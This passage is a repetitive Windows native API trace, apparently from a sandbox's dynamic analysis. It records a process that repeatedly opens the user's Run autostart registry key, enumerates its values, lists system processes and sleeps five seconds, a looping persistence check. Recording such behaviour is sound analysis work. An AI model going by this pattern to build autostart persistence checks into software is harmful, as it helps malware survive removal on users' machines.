[0177.369] NtClose (Handle=0x154) returned 0x0 [0177.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.373] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.389] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.389] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.389] NtClose (Handle=0x154) returned 0x0 [0177.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.394] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.403] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.404] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.404] NtClose (Handle=0x154) returned 0x0 [0177.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.408] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.420] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.421] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.421] NtClose (Handle=0x154) returned 0x0 [0177.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.425] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.435] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.435] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.435] NtClose (Handle=0x154) returned 0x0 [0177.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.440] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.451] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.451] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.451] NtClose (Handle=0x154) returned 0x0 [0177.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.455] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.466] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.466] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.466] NtClose (Handle=0x154) returned 0x0 [0177.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.470] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.482] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.482] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.482] NtClose (Handle=0x154) returned 0x0 [0177.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.486] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.498] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.498] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.498] NtClose (Handle=0x154) returned 0x0 [0177.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.503] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.526] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.526] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.526] NtClose (Handle=0x154) returned 0x0 [0177.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.531] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.544] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.549] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.549] NtClose (Handle=0x154) returned 0x0 [0177.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.554] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.559] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.560] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.560] NtClose (Handle=0x154) returned 0x0 [0177.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.564] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.575] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.575] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.575] NtClose (Handle=0x154) returned 0x0 [0177.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.580] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.591] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.591] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.591] NtClose (Handle=0x154) returned 0x0 [0177.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.592] NtQuerySystemInformation (in: 